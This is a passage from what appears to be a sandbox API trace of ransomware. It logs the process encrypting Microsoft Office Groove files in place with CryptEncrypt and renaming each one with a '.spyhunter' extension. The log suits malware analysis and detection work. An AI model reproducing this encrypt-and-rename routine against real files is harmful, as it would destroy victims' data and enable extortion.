hFile=0x154, liDistanceToMove=0xfffffc5e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.828] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3a2, lpNumberOfBytesWritten=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfad4*=0x3a2, lpOverlapped=0x0) returned 1 [0107.831] GetProcessHeap () returned 0x2c0000 [0107.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.831] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.831] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb14*, lpNumberOfBytesWritten=0x25cfad4*=0x4, lpOverlapped=0x0) returned 1 [0107.831] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfad4*=0x30, lpOverlapped=0x0) returned 1 [0107.831] CloseHandle (hObject=0x154) returned 1 [0107.831] GetProcessHeap () returned 0x2c0000 [0107.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.831] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html.spyhunter") returned 121 [0107.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formspreviewtemplate.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formspreviewtemplate.html.spyhunter")) returned 1 [0107.832] GetProcessHeap () returned 0x2c0000 [0107.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.833] GetProcessHeap () returned 0x2c0000 [0107.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0107.833] GetProcessHeap () returned 0x2c0000 [0107.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3970 | out: hHeap=0x2c0000) returned 1 [0107.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb18 | out: pbBuffer=0x25cfb18) returned 1 [0107.833] GetProcessHeap () returned 0x2c0000 [0107.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0107.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb10*=0x30) returned 1 [0107.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO") returned 94 [0107.834] StrStrW (lpFirst="FORM.ICO", lpSrch=".txt") returned 0x0 [0107.834] GetProcessHeap () returned 0x2c0000 [0107.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.834] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfad4*=0x13e, lpOverlapped=0x0) returned 1 [0107.835] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffec2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.835] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfad4*=0x13e, lpOverlapped=0x0) returned 1 [0107.835] GetProcessHeap () returned 0x2c0000 [0107.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.835] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.835] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb14*, lpNumberOfBytesWritten=0x25cfad4*=0x4, lpOverlapped=0x0) returned 1 [0107.835] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfad4*=0x30, lpOverlapped=0x0) returned 1 [0107.835] CloseHandle (hObject=0x154) returned 1 [0107.836] GetProcessHeap () returned 0x2c0000 [0107.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.836] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO.spyhunter") returned 104 [0107.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico.spyhunter")) returned 1 [0107.836] GetProcessHeap () returned 0x2c0000 [0107.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.836] GetProcessHeap () returned 0x2c0000 [0107.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0107.836] GetProcessHeap () returned 0x2c0000 [0107.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8ab8 | out: hHeap=0x2c0000) returned 1 [0107.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb10 | out: pbBuffer=0x25cfb10) returned 1 [0107.846] GetProcessHeap () returned 0x2c0000 [0107.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0107.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb08*=0x30) returned 1 [0107.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.846] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG") returned 115 [0107.847] StrStrW (lpFirst="TEXTVIEW.JPG", lpSrch=".txt") returned 0x0 [0107.847] GetProcessHeap () returned 0x2c0000 [0107.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.847] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfacc*=0x2800, lpOverlapped=0x0) returned 1 [0108.198] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.198] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfacc*=0x2800, lpOverlapped=0x0) returned 1 [0108.198] GetProcessHeap () returned 0x2c0000 [0108.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0108.198] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.198] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x25cfb0c*, lpNumberOfBytesWritten=0x25cfacc*=0x4, lpOverlapped=0x0) returned 1 [0108.198] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfacc*=0x30, lpOverlapped=0x0) returned 1 [0108.198] CloseHandle (hObject=0x154) returned 1 [0108.198] GetProcessHeap () returned 0x2c0000 [0108.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd7ad0 [0108.199] wnsprintfW (in: pszDest=0x2dd7ad0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG.spyhunter") returned 125 [0108.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textview.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textview.jpg.spyhunter")) returned 1 [0108.283] GetProcessHeap () returned 0x2c0000 [0108.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd7ad0 | out: hHeap=0x2c0000) returned 1 [0108.288] GetProcessHeap () returned 0x2c0000 [0108.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0108.288] GetProcessHeap () returned 0x2c0000 [0108.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf1aa0 | out: hHeap=0x2c0000) returned 1 [0108.289] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb10 | out: pbBuffer=0x25cfb10) returned 1 [0108.289] GetProcessHeap () returned 0x2c0000 [0108.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0108.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb08*=0x30) returned 1 [0108.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\validation.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0108.425] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js") returned 100 [0108.425] StrStrW (lpFirst="validation.js", lpSrch=".txt") returned 0x0 [0108.426] GetProcessHeap () returned 0x2c0000 [0108.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0108.427] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfacc*=0x2800, lpOverlapped=0x0) returned 1 [0108.438] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.438] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfacc*=0x2800, lpOverlapped=0x0) returned 1 [0108.439] GetProcessHeap () returned 0x2c0000 [0108.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0108.439] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.439] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x25cfb0c*, lpNumberOfBytesWritten=0x25cfacc*=0x4, lpOverlapped=0x0) returned 1 [0108.439] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfacc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfacc*=0x30, lpOverlapped=0x0) returned 1 [0108.439] CloseHandle (hObject=0x17c) returned 1 [0108.471] GetProcessHeap () returned 0x2c0000 [0108.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.471] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js.spyhunter") returned 110 [0108.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\validation.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\validation.js.spyhunter")) returned 1 [0108.472] GetProcessHeap () returned 0x2c0000 [0108.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.472] GetProcessHeap () returned 0x2c0000 [0108.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0108.472] GetProcessHeap () returned 0x2c0000 [0108.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf52c8 | out: hHeap=0x2c0000) returned 1 [0108.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb08 | out: pbBuffer=0x25cfb08) returned 1 [0108.472] GetProcessHeap () returned 0x2c0000 [0108.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0108.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb00*=0x30) returned 1 [0108.472] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0108.477] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 95 [0108.477] StrStrW (lpFirst="FORM.ICO", lpSrch=".txt") returned 0x0 [0108.477] GetProcessHeap () returned 0x2c0000 [0108.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0108.478] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfac4*=0x13e, lpOverlapped=0x0) returned 1 [0108.479] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffec2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.479] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfac4*=0x13e, lpOverlapped=0x0) returned 1 [0108.479] GetProcessHeap () returned 0x2c0000 [0108.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0108.479] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.479] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb04*, lpNumberOfBytesWritten=0x25cfac4*=0x4, lpOverlapped=0x0) returned 1 [0108.479] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfac4*=0x30, lpOverlapped=0x0) returned 1 [0108.479] CloseHandle (hObject=0x154) returned 1 [0108.479] GetProcessHeap () returned 0x2c0000 [0108.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0108.480] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO.spyhunter") returned 105 [0108.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico.spyhunter")) returned 1 [0108.481] GetProcessHeap () returned 0x2c0000 [0108.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0108.481] GetProcessHeap () returned 0x2c0000 [0108.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0108.481] GetProcessHeap () returned 0x2c0000 [0108.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9508 | out: hHeap=0x2c0000) returned 1 [0108.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb08 | out: pbBuffer=0x25cfb08) returned 1 [0108.481] GetProcessHeap () returned 0x2c0000 [0108.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0108.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb00*=0x30) returned 1 [0108.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsprinttemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0108.484] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html") returned 110 [0108.484] StrStrW (lpFirst="FormsPrintTemplate.html", lpSrch=".txt") returned 0x0 [0108.484] GetProcessHeap () returned 0x2c0000 [0108.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0108.484] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfac4*=0x612, lpOverlapped=0x0) returned 1 [0108.503] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff9ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.503] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfac4*=0x612, lpOverlapped=0x0) returned 1 [0108.504] GetProcessHeap () returned 0x2c0000 [0108.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0108.504] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.504] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb04*, lpNumberOfBytesWritten=0x25cfac4*=0x4, lpOverlapped=0x0) returned 1 [0108.504] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfac4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfac4*=0x30, lpOverlapped=0x0) returned 1 [0108.504] CloseHandle (hObject=0x154) returned 1 [0108.504] GetProcessHeap () returned 0x2c0000 [0108.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0108.504] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html.spyhunter") returned 120 [0108.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsprinttemplate.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsprinttemplate.html.spyhunter")) returned 1 [0108.505] GetProcessHeap () returned 0x2c0000 [0108.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0108.505] GetProcessHeap () returned 0x2c0000 [0108.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0108.505] GetProcessHeap () returned 0x2c0000 [0108.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21870 | out: hHeap=0x2c0000) returned 1 [0108.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb00 | out: pbBuffer=0x25cfb00) returned 1 [0108.506] GetProcessHeap () returned 0x2c0000 [0108.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0108.506] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaf8*=0x30) returned 1 [0108.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formspreviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0108.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html") returned 112 [0108.506] StrStrW (lpFirst="FormsPreviewTemplate.html", lpSrch=".txt") returned 0x0 [0108.506] GetProcessHeap () returned 0x2c0000 [0108.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0108.506] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfabc*=0x2800, lpOverlapped=0x0) returned 1 [0108.578] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.579] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfabc, lpOverlapped=0x0 | out: 